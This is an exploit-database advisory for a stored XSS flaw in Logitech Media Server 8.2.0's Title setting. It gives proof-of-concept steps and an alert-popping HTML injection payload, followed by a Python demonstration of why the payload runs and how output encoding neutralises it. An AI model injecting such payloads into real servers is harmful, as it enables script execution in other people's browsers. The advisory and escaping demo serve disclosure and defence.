Logitech Media Server 8.2.0 – ‘Title’ Cross-Site Scripting (XSS)

  • Author: Mert Daş
    Date: 2021-10-13
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/50413/
  • # Exploit Title: Logitech Media Server 8.2.0 - 'Title' Cross-Site Scripting (XSS)
    # Shodan Dork: Search Logitech Media Server
    # Date: 12.10.2021
    # Exploit Author: Mert Das
    # Vendor Homepage: www.logitech.com
    # Version: 8.2.0
    # Tested on: Windows 10, Linux
    
    POC:
    
    1. Go to Settings / Interface tab
    2. Add payload to Title section
    3. Payload : "><img src=1 onerror=alert(1)>
    4. Alert will pop up
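
Why the payload in step 3 runs, and the output encoding that stops it, as an added example (not code from the advisory or from Logitech Media Server). It assumes the saved title is echoed into a double-quoted HTML attribute, which the `">` prefix of the payload suggests; `TEMPLATE` and the function names are hypothetical.

```python
import html
from html.parser import HTMLParser

# Payload quoted in PoC step 3 of the advisory.
PAYLOAD = '"><img src=1 onerror=alert(1)>'
# Hypothetical template (assumption): the stored title echoed into a form field.
TEMPLATE = '<input type="text" name="title" value="{title}">'


def render_unsafe(title):
    """Interpolates the stored value verbatim (the vulnerable pattern)."""
    return TEMPLATE.format(title=title)


def render_safe(title):
    """Encodes &, <, >, " and ' before the value enters the attribute."""
    return TEMPLATE.format(title=html.escape(title, quote=True))


class TagAudit(HTMLParser):
    """Records each element, each on* handler, and the input's value attribute."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.handlers = []
        self.values = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        for name, value in attrs:
            if name.startswith("on"):
                self.handlers.append((tag, name))
            if tag == "input" and name == "value":
                self.values.append(value)


def audit(markup):
    parser = TagAudit()
    parser.feed(markup)
    parser.close()
    return parser


if __name__ == "__main__":
    for label, render in (("unsafe", render_unsafe), ("safe", render_safe)):
        result = audit(render(PAYLOAD))
        print(label, result.tags, result.handlers)
```

In the unsafe rendering the parser sees a second element carrying an `onerror` handler; in the encoded rendering the whole payload stays inside the `value` attribute as inert text.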